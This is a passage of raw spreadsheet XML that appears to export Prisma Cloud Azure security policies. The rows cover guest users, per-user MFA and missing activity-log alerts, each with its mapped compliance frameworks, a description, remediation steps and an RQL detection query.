Cyber Security Framework (AESCSF), Azure Security Benchmark (v3), ISO/IEC 27017:2015, Azure Security Benchmark (v3), CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), PCI DSS v4.0, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v12, New Zealand Information Security Manual (NZISM v3.4), TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CIS Controls v8, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), APRA (CPS 234) Information Security, ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST CSF, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Copy of New Zealand Information Security Manual (NZISM v3.4), HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, Copy of Azure Security Benchmark (v3), ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Copy of Azure Security Benchmark (v3), ITSG-33, Azure Security Benchmark (v2), Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v7.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Matt's ATT&amp;ACK, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2152" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2152" s="2" t="inlineStr"/>
      <c r="D2152" t="inlineStr"/>
      <c r="E2152" t="inlineStr"/>
      <c r="F2152" t="inlineStr"/>
      <c r="G2152" t="b">
        <v>1</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2152" t="inlineStr">
        <is>
          <t>azure-active-directory</t>
        </is>
      </c>
      <c r="K2152" t="inlineStr">
        <is>
          <t>Azure Active Directory Guest users found</t>
        </is>
      </c>
      <c r="L2152" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2152" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2152" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2152" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2152" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2152" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R2152" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S2152" t="inlineStr"/>
      <c r="T2152" t="b">
        <v>0</v>
      </c>
      <c r="U2152" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2152" t="inlineStr">
        <is>
          <t>azure-active-directory-user</t>
        </is>
      </c>
      <c r="W2152" t="inlineStr">
        <is>
          <t>This policy identifies Azure Active Directory Guest users. Azure Active Directory allows B2B collaboration which lets you invite people from outside your organisation to be guest users in your cloud account. Avoid creating guest user in your cloud account unless you have business need. Guest users are usually added for users outside your employee on-boarding/off-boarding process and could potentially be overlooked leading to a potential vulnerability.</t>
        </is>
      </c>
      <c r="X2152" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Go to 'Azure Active Directory' (Left Panel)
3. Click on 'Users' under 'Manage'
4. Search for reported user in search pane
5. Select on check box for the reported user
6. Click on 'Delete user' in top pane
7. Select 'OK' to confirm
Note: Verify impact caused by deleting Guest user</t>
        </is>
      </c>
      <c r="Y2152" t="inlineStr"/>
      <c r="Z2152" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-active-directory-user' AND json.rule = userType equals Guest</t>
        </is>
      </c>
      <c r="AA2152" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2152" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2152" t="inlineStr">
        <is>
          <t>PC-AZR-AD-559</t>
        </is>
      </c>
      <c r="AD2152" t="b">
        <v>1</v>
      </c>
      <c r="AE2152" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2152" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>62fe6a48-9084-449b-87b1-c9c0ab9350ba</t>
        </is>
      </c>
      <c r="AI2152" t="inlineStr">
        <is>
          <t>38a82dc7-6402-43fc-ab34-3b7848c642c3</t>
        </is>
      </c>
      <c r="AJ2152" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2152" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2153">
      <c r="A2153" t="inlineStr">
        <is>
          <t>ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, Secure Controls Framework (SCF) - 2024.2, New Zealand Information Security Manual (NZISM v3.4), NIST CSF v2.0, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, CRI Profile v2.0, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Telecommunications Security Act - TSA, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v1.2.1, Australian Energy Sector Cyber Security Framework (AESCSF), CIS Controls v7.1, CRI Profile v2.0, CIS Controls v8, CSA CCM v.4.0.6, Telecommunications Security Act - TSA, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, PCI DSS v4.0, HIPAA, CSA CCM v.4.0.6, ISO/IEC 27001:2022, HITRUST CSF v.11.2.0, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, PCI DSS v4.0, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MLPS 2.0 (Level 2), FFIEC, Australian Cyber Security Centre (ACSC) Essential Eight, ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2153" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2153" s="2" t="inlineStr"/>
      <c r="D2153" t="inlineStr"/>
      <c r="E2153" t="inlineStr"/>
      <c r="F2153" t="inlineStr"/>
      <c r="G2153" t="b">
        <v>1</v>
      </c>
      <c r="H21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153" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2153" t="inlineStr">
        <is>
          <t>azure-active-directory</t>
        </is>
      </c>
      <c r="K2153" t="inlineStr">
        <is>
          <t>Azure Active Directory MFA is not enabled for user</t>
        </is>
      </c>
      <c r="L2153" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="M2153" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2153" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2153" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2153" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2153" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2153" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2153" t="inlineStr"/>
      <c r="T2153" t="b">
        <v>0</v>
      </c>
      <c r="U2153" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2153" t="inlineStr">
        <is>
          <t>azure-active-directory-user-registration-details</t>
        </is>
      </c>
      <c r="W2153" t="inlineStr">
        <is>
          <t>This policy identifies Azure users for whom AD MFA (Active Directory Multi-Factor Authentication) is not enabled. 
Azure AD is a simple best practice that adds an extra layer of protection on top of your user name and password. MFA provides increased security for your Azure account settings and resources. Enabling Azure AD Multi-Factor Authentication using Conditional Access policies is the recommended approach to protect users.
As best practice, it is recommended to enable Azure AD Multi-Factor Authentication for users.</t>
        </is>
      </c>
      <c r="X2153" t="inlineStr">
        <is>
          <t>To enable per-user Azure AD Multi-Factor Authentication; follow below URL:
https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates</t>
        </is>
      </c>
      <c r="Y2153" t="inlineStr"/>
      <c r="Z2153" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-active-directory-user-registration-details' AND json.rule = isMfaRegistered is false as X; config from cloud.resource where api.name = 'azure-active-directory-user' AND json.rule = accountEnabled is true as Y; filter '$.X.userDisplayName equals $.Y.displayName'; show X;</t>
        </is>
      </c>
      <c r="AA2153" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2153" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2153" t="inlineStr">
        <is>
          <t>PC-AZR-AD-1233</t>
        </is>
      </c>
      <c r="AD2153" t="b">
        <v>1</v>
      </c>
      <c r="AE2153" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2153" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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53" t="inlineStr">
        <is>
          <t>aaf34bbf-dde9-4ab3-bc4f-4197efea0ce5</t>
        </is>
      </c>
      <c r="AI2153" t="inlineStr">
        <is>
          <t>12b988f1-b806-456c-be07-0ecfd8d9a825</t>
        </is>
      </c>
      <c r="AJ2153" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2153" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2154">
      <c r="A2154" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (Azure) Level 1, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), CSA CCM v.4.0.6, NIST 800-53 Rev 5, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Copy of Azure Security Benchmark (v3), ITSG-33, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CRI Profile v1.2.1, CSA CCM v4.0.12, New Zealand Information Security Manual (NZISM v3.4), Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CIS Controls v7.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, CIS v1.3.0 (Azure), ITSG-33, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, TX-RAMP Level 1, Copy of New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v2.0, TX-RAMP Level 2, CIS v1.5.0 (Azure) - Level 1, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CIS Controls v8.1, Azure Security Benchmark (v3), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, CIS v2.1.0 (Azure) Level 1, Azure Security Benchmark (v3), New Zealand Information Security Manual (NZISM v3.4), MTSBv2_Azure, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), CRI Profile v2.0, kashan ACSC Information Security Manual (ISM), Copy of New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, kfirdaus AWS Account-CS, CSA CCM v.4.0.6, CIS v1.4.0 (Azure), NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, Copy of Azure Security Benchmark (v3), DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, TX-RAMP Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), NIST CSF v2.0</t>
        </is>
      </c>
      <c r="B2154" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2154" s="2" t="inlineStr"/>
      <c r="D2154" t="inlineStr"/>
      <c r="E2154" t="inlineStr"/>
      <c r="F2154" t="inlineStr"/>
      <c r="G2154" t="b">
        <v>0</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2154" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2154" t="inlineStr">
        <is>
          <t>Azure Activity log alert for delete policy assignment does not exist</t>
        </is>
      </c>
      <c r="L2154" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2154" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2154" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2154" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2154" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2154" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2154" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2154" t="inlineStr"/>
      <c r="T2154" t="b">
        <v>0</v>
      </c>
      <c r="U2154" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2154" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2154" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Delete policy assignment does not exist. Creating an activity log alert for Delete policy assignment gives insight into changes done in azure policy - assignments and may reduce the time it takes to detect unsolicited changes.</t>
        </is>
      </c>
      <c r="X2154" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Delete policy assignment (Microsoft.Authorization/policyAssignments)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2154" t="inlineStr"/>
      <c r="Z2154" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-activity-log-alerts' AND json.rule = "location equal ignore case Global and properties.scopes[*] does not contain resourceGroups and properties.enabled equals true and properties.condition.allOf[?(@.field=='operationName')].equals equals Microsoft.Authorization/policyAssignments/delete" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2154" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2154" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2154" t="inlineStr">
        <is>
          <t>PC-AZR-MON-707</t>
        </is>
      </c>
      <c r="AD2154" t="b">
        <v>1</v>
      </c>
      <c r="AE2154" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2154" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>f922937b-d670-4497-916f-1c7374cdaa4f</t>
        </is>
      </c>
      <c r="AI2154" t="inlineStr">
        <is>
          <t>05f9dd81-ebae-4612-8662-f00248ad8652</t>
        </is>
      </c>
      <c r="AJ2154" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2154" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2155">
      <c r="A2155" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, Fedramp (Moderate), CSA CCM v.4.0.6, CIS v1.2.0 (Azure), PCI DSS v4.0, Telecommunications Security Act - TSA, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), PCI DSS v3.2.1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS v1.3.1 (Azure), MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, CIS v2.0.0 (Azure) Level 1, APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, testazure, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS v1.1 (Azure), Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Copy of CIS v1.2.0 (Azure), ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST 800-53 Rev 5,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CIS v1.3.0 (Azure), CSA CCM v.4.0.1, MTSBv2_Azure, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CIS v1.5.0 (Azure) - Level 1, CSA CCM v.4.0.1, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, Fedramp (Low), CIS v1.4.0 (Azure), NIST SP 800-171 Revision 3, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1,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Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, NIST CSF, Fedramp (Moderate), NIST CSF, ITSG-33, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, CIS v2.1.0 (Azure) Level 1, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2155" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2155" s="2" t="inlineStr"/>
      <c r="D2155" t="inlineStr"/>
      <c r="E2155" t="inlineStr"/>
      <c r="F2155" t="inlineStr"/>
      <c r="G2155" t="b">
        <v>0</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2155" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2155" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Create or update network security group does not exist</t>
        </is>
      </c>
      <c r="L2155" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2155" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2155" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2155" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2155" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2155" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2155" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2155" t="inlineStr"/>
      <c r="T2155" t="b">
        <v>0</v>
      </c>
      <c r="U2155" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2155" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2155" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Create or update network security group does not exist. Creating an activity log alert for Create or update network security group gives insight into network access changes and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2155" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Create or Update Network Security Group (Microsoft.Network/networkSecurityGroups)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2155" t="inlineStr"/>
      <c r="Z2155"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Microsoft.Network/networkSecurityGroups/write" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2155" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2155" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2155" t="inlineStr">
        <is>
          <t>PC-AZR-MON-487</t>
        </is>
      </c>
      <c r="AD2155" t="b">
        <v>1</v>
      </c>
      <c r="AE2155" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2155" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>5928a65d-65e0-4103-87c2-b16ac37f0243</t>
        </is>
      </c>
      <c r="AI2155" t="inlineStr">
        <is>
          <t>d9efba71-a2e1-4a2a-aac2-1697a629db97</t>
        </is>
      </c>
      <c r="AJ2155" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2155" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2156">
      <c r="A2156" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Fedramp (Moderate), CSA CCM v.4.0.6, NIST 800-53 Rev 5, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), PCI DSS v3.2.1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, CIS v1.4.0 (Azure), ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Copy of CIS v1.2.0 (Azure), CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, CIS v1.3.1 (Azure), ISO/IEC 27017:2015, NIST 800-53 Rev 5, ITSG-33, CIS v1.5.0 (Azure) - Level 1,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CIS v2.1.0 (Azure) Level 1, ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), CIS v1.3.0 (Azure), NIST SP 800-171 Revision 3, CIS v1.1 (Azure), CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), testazure, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.2.0 (Azure),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Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, NIST CSF, Fedramp (Moderate), NIST CSF, MTSBv2_Azure,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PCI DSS v4.0, CIS v2.0.0 (Azure) Level 1, Matt's ATT&amp;ACK, Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2156" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2156" s="2" t="inlineStr"/>
      <c r="D2156" t="inlineStr"/>
      <c r="E2156" t="inlineStr"/>
      <c r="F2156" t="inlineStr"/>
      <c r="G2156" t="b">
        <v>1</v>
